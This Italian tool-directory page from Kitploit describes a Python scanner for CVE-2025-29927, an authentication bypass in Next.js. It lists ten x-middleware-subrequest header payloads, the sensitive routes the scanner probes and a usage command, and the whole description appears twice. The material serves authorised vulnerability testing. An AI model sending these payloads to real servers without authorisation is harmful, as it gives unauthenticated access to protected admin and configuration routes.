Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-29927_Scanner — Questo script verifica la vulnerabilità CVE-2025-29927 nei server Next.js, testando più payload nell'header x-middleware-subrequest per rilevare accessi non autorizzati. | Kitploit
Strumenti/GitHubGitHub/aleongx/cve-2025-29927_scanner
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingRed Teaming
GitHubaleongx/cve-2025-29927_scanner

CVE-2025-29927_Scanner

Questo script verifica la vulnerabilità CVE-2025-29927 nei server Next.js, testando più payload nell'header x-middleware-subrequest per rilevare accessi non autorizzati.

Vedi Repository
1151 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-29927 Checker

📌 Introduzione

Questo script verifica la vulnerabilità CVE-2025-29927 nei server Next.js testando più payload nell'header x-middleware-subrequest per rilevare accessi non autorizzati.

❓ Cos'è CVE-2025-29927?

CVE-2025-29927 è una vulnerabilità che consente di aggirare le restrizioni di sicurezza in Next.js, concedendo l'accesso a route sensibili senza autenticazione.

⚙️ Come Funziona lo Script

🔹 1. Importazione delle Librerie

Lo script utilizza:

🛠️ argparse - per la gestione degli argomenti.

🌐 requests - per inviare richieste HTTP.

⏳ time - per le pause tra i test.

🎨 colorama - per formattare l'output della console con i colori.

🔹 2. Elenco dei Payload

Lo script testa più payload in x-middleware-subrequest, progettati per aggirare le restrizioni di sicurezza. Esempio:

root@kitploit:~
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"

🔹 3. Route Sensibili

Lo script analizza le risposte per percorsi come:

/admin, /dashboard, /settings, /private, /config

🔹 4. Processo di Scansione

✅ Mostra un banner nella console.✅ Invia richieste HTTP con diversi payload.✅ Verifica se il server usa Next.js.✅ Rileva l'accesso a route sensibili e segnala le vulnerabilità.

🔹 5. Gestione degli Errori

Lo script gestisce le eccezioni per evitare interruzioni dovute a errori di connessione.

🚀 Esempio di Utilizzo

Esegui lo script con:

python script.py -t https://example.com/api/auth

📢 Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a test etici e a un uso autorizzato. L'uso non autorizzato contro sistemi di terze parti è illegale.

===================SPAGNOLO===================

CVE-2025-29927 Checker

📌 Introduzione

Questo script verifica la vulnerabilità CVE-2025-29927 nei server Next.js, testando più payload nell'header x-middleware-subrequest per rilevare accessi non autorizzati.

❓ Cos'è CVE-2025-29927?

CVE-2025-29927 è una vulnerabilità che consente di aggirare le restrizioni di sicurezza in Next.js, concedendo l'accesso a route sensibili senza autenticazione.

⚙️ Come Funziona lo Script

🔹 1. Importazione delle Librerie

Lo script utilizza:

🛠️ argparse - per la gestione degli argomenti.

🌐 requests - per inviare richieste HTTP.

⏳ time - per le pause tra i test.

🎨 colorama - per formattare l'output della console con i colori.

🔹 2. Elenco dei Payload

Lo script testa più payload in x-middleware-subrequest, progettati per aggirare le restrizioni di sicurezza. Esempio:

root@kitploit:~
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"

🔹 3. Route Sensibili

Lo script analizza le risposte alla ricerca di percorsi come:

/admin, /dashboard, /settings, /private, /config

🔹 4. Processo di Scansione

✅ Mostra un banner nella console.✅ Invia richieste HTTP con diversi payload.✅ Verifica se il server usa Next.js.✅ Rileva l'accesso a route sensibili e segnala le vulnerabilità.

🔹 5. Gestione degli Errori

Lo script gestisce le eccezioni per evitare interruzioni dovute a errori di connessione.

🚀 Esempio di Utilizzo

Esegui lo script con:

python script.py -t https://example.com/api/auth

📢 Avviso Legale

Questo strumento è destinato esclusivamente a test etici e a un uso autorizzato. L'uso non autorizzato su sistemi di terze parti è illegale.

Scarica lo strumento